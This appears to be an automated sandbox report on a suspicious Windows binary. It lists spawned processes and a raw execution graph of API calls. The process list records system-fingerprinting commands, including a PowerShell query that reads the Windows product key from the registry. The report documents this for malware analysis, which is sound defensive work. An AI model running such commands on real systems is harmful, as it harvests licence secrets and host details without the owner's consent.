                                                                                                                                                                                                                                      Start time:03:42:31
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:84
                                                                                                                                                                                                                                      Start time:03:42:31
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:85
                                                                                                                                                                                                                                      Start time:03:42:31
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:86
                                                                                                                                                                                                                                      Start time:03:42:32
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:87
                                                                                                                                                                                                                                      Start time:03:42:32
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:88
                                                                                                                                                                                                                                      Start time:03:42:32
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:8.6%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:14.2%
                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                        Total number of Limit Nodes:24
                                                                                                                                                                                                                                        execution_graph 19471 7ff78da7ac53 19472 7ff78da7ac63 19471->19472 19475 7ff78da654e8 LeaveCriticalSection 19472->19475 18858 7ff78da699d1 18859 7ff78da6a448 45 API calls 18858->18859 18860 7ff78da699d6 18859->18860 18861 7ff78da699fd GetModuleHandleW 18860->18861 18862 7ff78da69a47 18860->18862 18861->18862 18867 7ff78da69a0a 18861->18867 18870 7ff78da698d4 18862->18870 18867->18862 18884 7ff78da69af8 GetModuleHandleExW 18867->18884 18890 7ff78da70348 EnterCriticalSection 18870->18890 18885 7ff78da69b2c GetProcAddress 18884->18885 18886 7ff78da69b55 18884->18886 18889 7ff78da69b3e 18885->18889 18887 7ff78da69b5a FreeLibrary 18886->18887 18888 7ff78da69b61 18886->18888 18887->18888 18888->18862 18889->18886 18911 7ff78da5bb50 18912 7ff78da5bb7e 18911->18912 18913 7ff78da5bb65 18911->18913 18913->18912 18915 7ff78da6d66c 12 API calls 18913->18915 18914 7ff78da5bbde 18915->18914 19826 7ff78da5cbc0 19827 7ff78da5cbd0 19826->19827 19843 7ff78da69c18 19827->19843 19829 7ff78da5cbdc 19849 7ff78da5ceb8 19829->19849 19831 7ff78da5d19c 7 API calls 19833 7ff78da5cc75 19831->19833 19832 7ff78da5cbf4 _RTC_Initialize 19841 7ff78da5cc49 19832->19841 19854 7ff78da5d068 19832->19854 19835 7ff78da5cc09 19857 7ff78da69084 19835->19857 19841->19831 19842 7ff78da5cc65 19841->19842 19844 7ff78da69c29 19843->19844 19845 7ff78da64f78 memcpy_s 11 API calls 19844->19845 19846 7ff78da69c31 19844->19846 19847 7ff78da69c40 19845->19847 19846->19829 19848 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19847->19848 19848->19846 19850 7ff78da5cec9 19849->19850 19853 7ff78da5cece __scrt_release_startup_lock 19849->19853 19851 7ff78da5d19c 7 API calls 19850->19851 19850->19853 19852 7ff78da5cf42 19851->19852 19853->19832 19882 7ff78da5d02c 19854->19882 19856 7ff78da5d071 19856->19835 19858 7ff78da690a4 19857->19858 19880 7ff78da5cc15 19857->19880 19859 7ff78da690ac 19858->19859 19860 7ff78da690c2 GetModuleFileNameW 19858->19860 19861 7ff78da64f78 memcpy_s 11 API calls 19859->19861 19864 7ff78da690ed 19860->19864 19862 7ff78da690b1 19861->19862 19863 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19862->19863 19863->19880 19865 7ff78da69024 11 API calls 19864->19865 19866 7ff78da6912d 19865->19866 19867 7ff78da69135 19866->19867 19872 7ff78da6914d 19866->19872 19868 7ff78da64f78 memcpy_s 11 API calls 19867->19868 19869 7ff78da6913a 19868->19869 19871 7ff78da6a9b8 __free_lconv_num 11 API calls 19869->19871 19870 7ff78da6916f 19873 7ff78da6a9b8 __free_lconv_num 11 API calls 19870->19873 19871->19880 19872->19870 19874 7ff78da6919b 19872->19874 19875 7ff78da691b4 19872->19875 19873->19880 19876 7ff78da6a9b8 __free_lconv_num 11 API calls 19874->19876 19878 7ff78da6a9b8 __free_lconv_num 11 API calls 19875->19878 19877 7ff78da691a4 19876->19877 19879 7ff78da6a9b8 __free_lconv_num 11 API calls 19877->19879 19878->19870 19879->19880 19880->19841 19881 7ff78da5d13c InitializeSListHead 19880->19881 19883 7ff78da5d046 19882->19883 19885 7ff78da5d03f 19882->19885 19886 7ff78da6a25c 19883->19886 19885->19856 19889 7ff78da69e98 19886->19889 19896 7ff78da70348 EnterCriticalSection 19889->19896 19476 7ff78da6b040 19477 7ff78da6b045 19476->19477 19478 7ff78da6b05a 19476->19478 19482 7ff78da6b060 19477->19482 19483 7ff78da6b0aa 19482->19483 19484 7ff78da6b0a2 19482->19484 19486 7ff78da6a9b8 __free_lconv_num 11 API calls 19483->19486 19485 7ff78da6a9b8 __free_lconv_num 11 API calls 19484->19485 19485->19483 19487 7ff78da6b0b7 19486->19487 19488 7ff78da6a9b8 __free_lconv_num 11 API calls 19487->19488 19489 7ff78da6b0c4 19488->19489 19490 7ff78da6a9b8 __free_lconv_num 11 API calls 19489->19490 19491 7ff78da6b0d1 19490->19491 19492 7ff78da6a9b8 __free_lconv_num 11 API calls 19491->19492 19493 7ff78da6b0de 19492->19493 19494 7ff78da6a9b8 __free_lconv_num 11 API calls 19493->19494 19495 7ff78da6b0eb 19494->19495 19496 7ff78da6a9b8 __free_lconv_num 11 API calls 19495->19496 19497 7ff78da6b0f8 19496->19497 19498 7ff78da6a9b8 __free_lconv_num 11 API calls 19497->19498 19499 7ff78da6b105 19498->19499 19500 7ff78da6a9b8 __free_lconv_num 11 API calls 19499->19500 19501 7ff78da6b115 19500->19501 19502 7ff78da6a9b8 __free_lconv_num 11 API calls 19501->19502 19503 7ff78da6b125 19502->19503 19508 7ff78da6af04 19503->19508 19522 7ff78da70348 EnterCriticalSection 19508->19522 19900 7ff78da69dc0 19903 7ff78da69d3c 19900->19903 19910 7ff78da70348 EnterCriticalSection 19903->19910 15941 7ff78da5ccac 15962 7ff78da5ce7c 15941->15962 15944 7ff78da5cdf8 16116 7ff78da5d19c IsProcessorFeaturePresent 15944->16116 15945 7ff78da5ccc8 __scrt_acquire_startup_lock 15947 7ff78da5ce02 15945->15947 15954 7ff78da5cce6 __scrt_release_startup_lock 15945->15954 15948 7ff78da5d19c 7 API calls 15947->15948 15950 7ff78da5ce0d _CreateFrameInfo 15948->15950 15949 7ff78da5cd0b 15951 7ff78da5cd91 15968 7ff78da5d2e4 15951->15968 15953 7ff78da5cd96 15971 7ff78da51000 15953->15971 15954->15949 15954->15951 16105 7ff78da69b9c 15954->16105 15959 7ff78da5cdb9 15959->15950 16112 7ff78da5d000 15959->16112 15963 7ff78da5ce84 15962->15963 15964 7ff78da5ce90 __scrt_dllmain_crt_thread_attach 15963->15964 15965 7ff78da5ccc0 15964->15965 15966 7ff78da5ce9d 15964->15966 15965->15944 15965->15945 15966->15965 16123 7ff78da5d8f8 15966->16123 16150 7ff78da7a540 15968->16150 15970 7ff78da5d2fb GetStartupInfoW 15970->15953 15972 7ff78da51009 15971->15972 16152 7ff78da654f4 15972->16152 15974 7ff78da537fb 16159 7ff78da536b0 15974->16159 15980 7ff78da5391b 16328 7ff78da545b0 15980->16328 15981 7ff78da5383c 16319 7ff78da51c80 15981->16319 15985 7ff78da5385b 16231 7ff78da58a20 15985->16231 15988 7ff78da5396a 16351 7ff78da52710 15988->16351 15991 7ff78da5388e 15998 7ff78da538bb __std_exception_destroy 15991->15998 16323 7ff78da58b90 15991->16323 15992 7ff78da5395d 15993 7ff78da53984 15992->15993 15994 7ff78da53962 15992->15994 15996 7ff78da51c80 49 API calls 15993->15996 16347 7ff78da600bc 15994->16347 15999 7ff78da539a3 15996->15999 16000 7ff78da58a20 14 API calls 15998->16000 16007 7ff78da538de __std_exception_destroy 15998->16007 16004 7ff78da51950 115 API calls 15999->16004 16000->16007 16002 7ff78da53a0b 16003 7ff78da58b90 40 API calls 16002->16003 16005 7ff78da53a17 16003->16005 16006 7ff78da539ce 16004->16006 16008 7ff78da58b90 40 API calls 16005->16008 16006->15985 16009 7ff78da539de 16006->16009 16013 7ff78da5390e __std_exception_destroy 16007->16013 16362 7ff78da58b30 16007->16362 16010 7ff78da53a23 16008->16010 16011 7ff78da52710 54 API calls 16009->16011 16012 7ff78da58b90 40 API calls 16010->16012 16019 7ff78da53808 __std_exception_destroy 16011->16019 16012->16013 16014 7ff78da58a20 14 API calls 16013->16014 16015 7ff78da53a3b 16014->16015 16016 7ff78da53b2f 16015->16016 16017 7ff78da53a60 __std_exception_destroy 16015->16017 16018 7ff78da52710 54 API calls 16016->16018 16020 7ff78da58b30 40 API calls 16017->16020 16031 7ff78da53aab 16017->16031 16018->16019 16369 7ff78da5c5c0 16019->16369 16020->16031 16021 7ff78da58a20 14 API calls 16022 7ff78da53bf4 __std_exception_destroy 16021->16022 16023 7ff78da53c46 16022->16023 16024 7ff78da53d41 16022->16024 16025 7ff78da53cd4 16023->16025 16026 7ff78da53c50 16023->16026 16378 7ff78da544d0 16024->16378 16029 7ff78da58a20 14 API calls 16025->16029 16244 7ff78da590e0 16026->16244 16033 7ff78da53ce0 16029->16033 16030 7ff78da53d4f 16034 7ff78da53d65 16030->16034 16035 7ff78da53d71 16030->16035 16031->16021 16036 7ff78da53c61 16033->16036 16040 7ff78da53ced 16033->16040 16381 7ff78da54620 16034->16381 16038 7ff78da51c80 49 API calls 16035->16038 16042 7ff78da52710 54 API calls 16036->16042 16048 7ff78da53cc8 __std_exception_destroy 16038->16048 16043 7ff78da51c80 49 API calls 16040->16043 16042->16019 16046 7ff78da53d0b 16043->16046 16044 7ff78da53dc4 16294 7ff78da59400 16044->16294 16046->16048 16049 7ff78da53d12 16046->16049 16047 7ff78da53dd7 SetDllDirectoryW 16053 7ff78da53e0a 16047->16053 16096 7ff78da53e5a 16047->16096 16048->16044 16050 7ff78da53da7 SetDllDirectoryW LoadLibraryExW 16048->16050 16052 7ff78da52710 54 API calls 16049->16052 16050->16044 16052->16019 16055 7ff78da58a20 14 API calls 16053->16055 16054 7ff78da53ffc 16057 7ff78da54029 16054->16057 16058 7ff78da54006 PostMessageW GetMessageW 16054->16058 16062 7ff78da53e16 __std_exception_destroy 16055->16062 16056 7ff78da53f1b 16299 7ff78da533c0 16056->16299 16458 7ff78da53360 16057->16458 16058->16057 16065 7ff78da53ef2 16062->16065 16066 7ff78da53e4e 16062->16066 16069 7ff78da58b30 40 API calls 16065->16069 16066->16096 16384 7ff78da56db0 16066->16384 16069->16096 16074 7ff78da56fb0 FreeLibrary 16077 7ff78da5404f 16074->16077 16082 7ff78da53e81 16085 7ff78da53ea2 16082->16085 16097 7ff78da53e85 16082->16097 16405 7ff78da56df0 16082->16405 16085->16097 16424 7ff78da571a0 16085->16424 16096->16054 16096->16056 16097->16096 16440 7ff78da52a50 16097->16440 16106 7ff78da69bb3 16105->16106 16107 7ff78da69bd4 16105->16107 16106->15951 18696 7ff78da6a448 16107->18696 16110 7ff78da5d328 GetModuleHandleW 16111 7ff78da5d339 16110->16111 16111->15959 16113 7ff78da5d011 16112->16113 16114 7ff78da5cdd0 16113->16114 16115 7ff78da5d8f8 7 API calls 16113->16115 16114->15949 16115->16114 16117 7ff78da5d1c2 _isindst memcpy_s 16116->16117 16118 7ff78da5d1e1 RtlCaptureContext RtlLookupFunctionEntry 16117->16118 16119 7ff78da5d20a RtlVirtualUnwind 16118->16119 16120 7ff78da5d246 memcpy_s 16118->16120 16119->16120 16121 7ff78da5d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16120->16121 16122 7ff78da5d2c6 _isindst 16121->16122 16122->15947 16124 7ff78da5d90a 16123->16124 16125 7ff78da5d900 16123->16125 16124->15965 16129 7ff78da5dc94 16125->16129 16130 7ff78da5dca3 16129->16130 16131 7ff78da5d905 16129->16131 16137 7ff78da5ded0 16130->16137 16133 7ff78da5dd00 16131->16133 16134 7ff78da5dd2b 16133->16134 16135 7ff78da5dd0e DeleteCriticalSection 16134->16135 16136 7ff78da5dd2f 16134->16136 16135->16134 16136->16124 16141 7ff78da5dd38 16137->16141 16142 7ff78da5de22 TlsFree 16141->16142 16147 7ff78da5dd7c __vcrt_InitializeCriticalSectionEx 16141->16147 16143 7ff78da5ddaa LoadLibraryExW 16145 7ff78da5ddcb GetLastError 16143->16145 16146 7ff78da5de49 16143->16146 16144 7ff78da5de69 GetProcAddress 16144->16142 16145->16147 16146->16144 16148 7ff78da5de60 FreeLibrary 16146->16148 16147->16142 16147->16143 16147->16144 16149 7ff78da5dded LoadLibraryExW 16147->16149 16148->16144 16149->16146 16149->16147 16151 7ff78da7a530 16150->16151 16151->15970 16151->16151 16154 7ff78da6f4f0 16152->16154 16153 7ff78da6f543 16471 7ff78da6a884 16153->16471 16154->16153 16156 7ff78da6f596 16154->16156 16481 7ff78da6f3c8 16156->16481 16158 7ff78da6f56c 16158->15974 16588 7ff78da5c8c0 16159->16588 16162 7ff78da536eb GetLastError 16595 7ff78da52c50 16162->16595 16163 7ff78da53710 16590 7ff78da592f0 FindFirstFileExW 16163->16590 16167 7ff78da5377d 16621 7ff78da594b0 16167->16621 16168 7ff78da53723 16610 7ff78da59370 CreateFileW 16168->16610 16169 7ff78da5c5c0 _log10_special 8 API calls 16172 7ff78da537b5 16169->16172 16172->16019 16181 7ff78da51950 16172->16181 16174 7ff78da5378b 16176 7ff78da52810 49 API calls 16174->16176 16178 7ff78da53706 16174->16178 16175 7ff78da53734 16613 7ff78da52810 16175->16613 16176->16178 16178->16169 16180 7ff78da5374c __vcrt_InitializeCriticalSectionEx 16180->16167 16182 7ff78da545b0 108 API calls 16181->16182 16183 7ff78da51985 16182->16183 16184 7ff78da51c43 16183->16184 16186 7ff78da57f80 83 API calls 16183->16186 16185 7ff78da5c5c0 _log10_special 8 API calls 16184->16185 16187 7ff78da51c5e 16185->16187 16188 7ff78da519cb 16186->16188 16187->15980 16187->15981 16230 7ff78da51a03 16188->16230 17026 7ff78da60744 16188->17026 16190 7ff78da600bc 74 API calls 16190->16184 16191 7ff78da519e5 16192 7ff78da51a08 16191->16192 16193 7ff78da519e9 16191->16193 17030 7ff78da6040c 16192->17030 16194 7ff78da64f78 memcpy_s 11 API calls 16193->16194 16196 7ff78da519ee 16194->16196 17033 7ff78da52910 16196->17033 16199 7ff78da51a45 16204 7ff78da51a7b 16199->16204 16205 7ff78da51a5c 16199->16205 16200 7ff78da51a26 16201 7ff78da64f78 memcpy_s 11 API calls 16200->16201 16202 7ff78da51a2b 16201->16202 16203 7ff78da52910 54 API calls 16202->16203 16203->16230 16207 7ff78da51c80 49 API calls 16204->16207 16206 7ff78da64f78 memcpy_s 11 API calls 16205->16206 16208 7ff78da51a61 16206->16208 16209 7ff78da51a92 16207->16209 16210 7ff78da52910 54 API calls 16208->16210 16211 7ff78da51c80 49 API calls 16209->16211 16210->16230 16212 7ff78da51add 16211->16212 16213 7ff78da60744 73 API calls 16212->16213 16214 7ff78da51b01 16213->16214 16215 7ff78da51b35 16214->16215 16216 7ff78da51b16 16214->16216 16217 7ff78da6040c _fread_nolock 53 API calls 16215->16217 16218 7ff78da64f78 memcpy_s 11 API calls 16216->16218 16219 7ff78da51b4a 16217->16219 16220 7ff78da51b1b 16218->16220 16222 7ff78da51b6f 16219->16222 16223 7ff78da51b50 16219->16223 16221 7ff78da52910 54 API calls 16220->16221 16221->16230 17048 7ff78da60180 16222->17048 16224 7ff78da64f78 memcpy_s 11 API calls 16223->16224 16226 7ff78da51b55 16224->16226 16228 7ff78da52910 54 API calls 16226->16228 16228->16230 16229 7ff78da52710 54 API calls 16229->16230 16230->16190 16232 7ff78da58a2a 16231->16232 16233 7ff78da59400 2 API calls 16232->16233 16234 7ff78da58a49 GetEnvironmentVariableW 16233->16234 16235 7ff78da58a66 ExpandEnvironmentStringsW 16234->16235 16236 7ff78da58ab2 16234->16236 16235->16236 16238 7ff78da58a88 16235->16238 16237 7ff78da5c5c0 _log10_special 8 API calls 16236->16237 16239 7ff78da58ac4 16237->16239 16240 7ff78da594b0 2 API calls 16238->16240 16239->15991 16241 7ff78da58a9a 16240->16241 16242 7ff78da5c5c0 _log10_special 8 API calls 16241->16242 16243 7ff78da58aaa 16242->16243 16243->15991 16245 7ff78da590f5 16244->16245 17266 7ff78da58760 GetCurrentProcess OpenProcessToken 16245->17266 16248 7ff78da58760 7 API calls 16249 7ff78da59121 16248->16249 16250 7ff78da5913a 16249->16250 16251 7ff78da59154 16249->16251 16252 7ff78da526b0 48 API calls 16250->16252 16253 7ff78da526b0 48 API calls 16251->16253 16254 7ff78da59152 16252->16254 16255 7ff78da59167 LocalFree LocalFree 16253->16255 16254->16255 16256 7ff78da59183 16255->16256 16259 7ff78da5918f 16255->16259 17276 7ff78da52b50 16256->17276 16258 7ff78da5c5c0 _log10_special 8 API calls 16260 7ff78da53c55 16258->16260 16259->16258 16260->16036 16261 7ff78da58850 16260->16261 16262 7ff78da58868 16261->16262 16263 7ff78da5888c 16262->16263 16264 7ff78da588ea GetTempPathW GetCurrentProcessId 16262->16264 16266 7ff78da58a20 14 API calls 16263->16266 17285 7ff78da525c0 16264->17285 16267 7ff78da58898 16266->16267 17292 7ff78da581c0 16267->17292 16272 7ff78da588d8 __std_exception_destroy 16293 7ff78da589c4 __std_exception_destroy 16272->16293 16274 7ff78da58918 __std_exception_destroy 16280 7ff78da58955 __std_exception_destroy 16274->16280 17289 7ff78da68bd8 16274->17289 16276 7ff78da588be __std_exception_destroy 16276->16264 16283 7ff78da588cc 16276->16283 16279 7ff78da5c5c0 _log10_special 8 API calls 16282 7ff78da53cbb 16279->16282 16285 7ff78da59400 2 API calls 16280->16285 16280->16293 16282->16036 16282->16048 16284 7ff78da52810 49 API calls 16283->16284 16284->16272 16286 7ff78da589a1 16285->16286 16287 7ff78da589d9 16286->16287 16288 7ff78da589a6 16286->16288 16289 7ff78da682a8 38 API calls 16287->16289 16290 7ff78da59400 2 API calls 16288->16290 16289->16293 16291 7ff78da589b6 16290->16291 16292 7ff78da682a8 38 API calls 16291->16292 16292->16293 16293->16279 16295 7ff78da59422 MultiByteToWideChar 16294->16295 16297 7ff78da59446 16294->16297 16295->16297 16298 7ff78da5945c __std_exception_destroy 16295->16298 16296 7ff78da59463 MultiByteToWideChar 16296->16298 16297->16296 16297->16298 16298->16047 16311 7ff78da533ce memcpy_s 16299->16311 16300 7ff78da5c5c0 _log10_special 8 API calls 16302 7ff78da53664 16300->16302 16301 7ff78da535c7 16301->16300 16302->16019 16318 7ff78da590c0 LocalFree 16302->16318 16304 7ff78da51c80 49 API calls 16304->16311 16305 7ff78da535e2 16307 7ff78da52710 54 API calls 16305->16307 16307->16301 16310 7ff78da535c9 16313 7ff78da52710 54 API calls 16310->16313 16311->16301 16311->16304 16311->16305 16311->16310 16312 7ff78da52a50 54 API calls 16311->16312 16316 7ff78da535d0 16311->16316 17581 7ff78da54550 16311->17581 17587 7ff78da57e10 16311->17587 17599 7ff78da51600 16311->17599 17647 7ff78da57110 16311->17647 17651 7ff78da54180 16311->17651 17695 7ff78da54440 16311->17695 16312->16311 16313->16301 16317 7ff78da52710 54 API calls 16316->16317 16317->16301 16320 7ff78da51ca5 16319->16320 16321 7ff78da649f4 49 API calls 16320->16321 16322 7ff78da51cc8 16321->16322 16322->15985 16324 7ff78da59400 2 API calls 16323->16324 16325 7ff78da58ba4 16324->16325 16326 7ff78da682a8 38 API calls 16325->16326 16327 7ff78da58bb6 __std_exception_destroy 16326->16327 16327->15998 16329 7ff78da545bc 16328->16329 16330 7ff78da59400 2 API calls 16329->16330 16331 7ff78da545e4 16330->16331 16332 7ff78da59400 2 API calls 16331->16332 16333 7ff78da545f7 16332->16333 17878 7ff78da66004 16333->17878 16336 7ff78da5c5c0 _log10_special 8 API calls 16337 7ff78da5392b 16336->16337 16337->15988 16338 7ff78da57f80 16337->16338 16339 7ff78da57fa4 16338->16339 16340 7ff78da60744 73 API calls 16339->16340 16345 7ff78da5807b __std_exception_destroy 16339->16345 16341 7ff78da57fc0 16340->16341 16341->16345 18270 7ff78da67938 16341->18270 16343 7ff78da60744 73 API calls 16346 7ff78da57fd5 16343->16346 16344 7ff78da6040c _fread_nolock 53 API calls 16344->16346 16345->15992 16346->16343 16346->16344 16346->16345 16348 7ff78da600ec 16347->16348 18285 7ff78da5fe98 16348->18285 16350 7ff78da60105 16350->15988 16352 7ff78da5c8c0 16351->16352 16353 7ff78da52734 GetCurrentProcessId 16352->16353 16354 7ff78da51c80 49 API calls 16353->16354 16355 7ff78da52787 16354->16355 16356 7ff78da649f4 49 API calls 16355->16356 16357 7ff78da527cf 16356->16357 16358 7ff78da52620 12 API calls 16357->16358 16359 7ff78da527f1 16358->16359 16360 7ff78da5c5c0 _log10_special 8 API calls 16359->16360 16361 7ff78da52801 16360->16361 16361->16019 16363 7ff78da59400 2 API calls 16362->16363 16364 7ff78da58b4c 16363->16364 16365 7ff78da59400 2 API calls 16364->16365 16366 7ff78da58b5c 16365->16366 16367 7ff78da682a8 38 API calls 16366->16367 16368 7ff78da58b6a __std_exception_destroy 16367->16368 16368->16002 16370 7ff78da5c5c9 16369->16370 16371 7ff78da53ca7 16370->16371 16372 7ff78da5c950 IsProcessorFeaturePresent 16370->16372 16371->16110 16373 7ff78da5c968 16372->16373 18296 7ff78da5cb48 RtlCaptureContext 16373->18296 16379 7ff78da51c80 49 API calls 16378->16379 16380 7ff78da544ed 16379->16380 16380->16030 16382 7ff78da51c80 49 API calls 16381->16382 16383 7ff78da54650 16382->16383 16383->16048 16385 7ff78da56dc5 16384->16385 16386 7ff78da64f78 memcpy_s 11 API calls 16385->16386 16389 7ff78da53e6c 16385->16389 16387 7ff78da56dd2 16386->16387 16388 7ff78da52910 54 API calls 16387->16388 16388->16389 16390 7ff78da57330 16389->16390 18301 7ff78da51470 16390->18301 16392 7ff78da57358 16393 7ff78da54620 49 API calls 16392->16393 16403 7ff78da574a9 __std_exception_destroy 16392->16403 16394 7ff78da5737a 16393->16394 16395 7ff78da5737f 16394->16395 16396 7ff78da54620 49 API calls 16394->16396 16397 7ff78da52a50 54 API calls 16395->16397 16398 7ff78da5739e 16396->16398 16397->16403 16398->16395 16399 7ff78da54620 49 API calls 16398->16399 16400 7ff78da573ba 16399->16400 16400->16395 16401 7ff78da573c3 16400->16401 16402 7ff78da52710 54 API calls 16401->16402 16404 7ff78da57433 __std_exception_destroy memcpy_s 16401->16404 16402->16403 16403->16082 16404->16082 16415 7ff78da56e0c 16405->16415 16406 7ff78da5c5c0 _log10_special 8 API calls 16407 7ff78da56f41 16406->16407 16407->16085 16408 7ff78da51840 45 API calls 16408->16415 16409 7ff78da56f9a 16411 7ff78da52710 54 API calls 16409->16411 16410 7ff78da51c80 49 API calls 16410->16415 16421 7ff78da56f2f 16411->16421 16412 7ff78da56f87 16414 7ff78da52710 54 API calls 16412->16414 16413 7ff78da54550 10 API calls 16413->16415 16414->16421 16415->16408 16415->16409 16415->16410 16415->16412 16415->16413 16416 7ff78da57e10 52 API calls 16415->16416 16417 7ff78da52a50 54 API calls 16415->16417 16418 7ff78da56f74 16415->16418 16420 7ff78da51600 118 API calls 16415->16420 16415->16421 16422 7ff78da56f5d 16415->16422 16416->16415 16417->16415 16419 7ff78da52710 54 API calls 16418->16419 16419->16421 16420->16415 16421->16406 16423 7ff78da52710 54 API calls 16422->16423 16423->16421 18331 7ff78da59070 16424->18331 16426 7ff78da571b9 16427 7ff78da59070 3 API calls 16426->16427 16428 7ff78da571cc 16427->16428 16429 7ff78da571ff 16428->16429 16430 7ff78da571e4 16428->16430 16441 7ff78da5c8c0 16440->16441 16442 7ff78da52a74 GetCurrentProcessId 16441->16442 16443 7ff78da51c80 49 API calls 16442->16443 16444 7ff78da52ac7 16443->16444 16445 7ff78da649f4 49 API calls 16444->16445 16446 7ff78da52b0f 16445->16446 16447 7ff78da52620 12 API calls 16446->16447 16448 7ff78da52b31 16447->16448 16449 7ff78da5c5c0 _log10_special 8 API calls 16448->16449 18407 7ff78da56350 16458->18407 16461 7ff78da53399 16467 7ff78da53670 16461->16467 16463 7ff78da53381 16463->16461 18475 7ff78da56040 16463->18475 16465 7ff78da5338d 16465->16461 16468 7ff78da5367e 16467->16468 16469 7ff78da5368f 16468->16469 18695 7ff78da59050 FreeLibrary 16468->18695 16469->16074 16488 7ff78da6a5cc 16471->16488 16475 7ff78da6a8bf 16475->16158 16587 7ff78da654dc EnterCriticalSection 16481->16587 16489 7ff78da6a5e8 GetLastError 16488->16489 16490 7ff78da6a623 16488->16490 16491 7ff78da6a5f8 16489->16491 16490->16475 16494 7ff78da6a638 16490->16494 16501 7ff78da6b400 16491->16501 16495 7ff78da6a66c 16494->16495 16496 7ff78da6a654 GetLastError SetLastError 16494->16496 16495->16475 16497 7ff78da6a970 IsProcessorFeaturePresent 16495->16497 16496->16495 16498 7ff78da6a983 16497->16498 16579 7ff78da6a684 16498->16579 16502 7ff78da6b43a FlsSetValue 16501->16502 16503 7ff78da6b41f FlsGetValue 16501->16503 16504 7ff78da6b447 16502->16504 16507 7ff78da6a613 SetLastError 16502->16507 16505 7ff78da6b434 16503->16505 16503->16507 16518 7ff78da6ec08 16504->16518 16505->16502 16507->16490 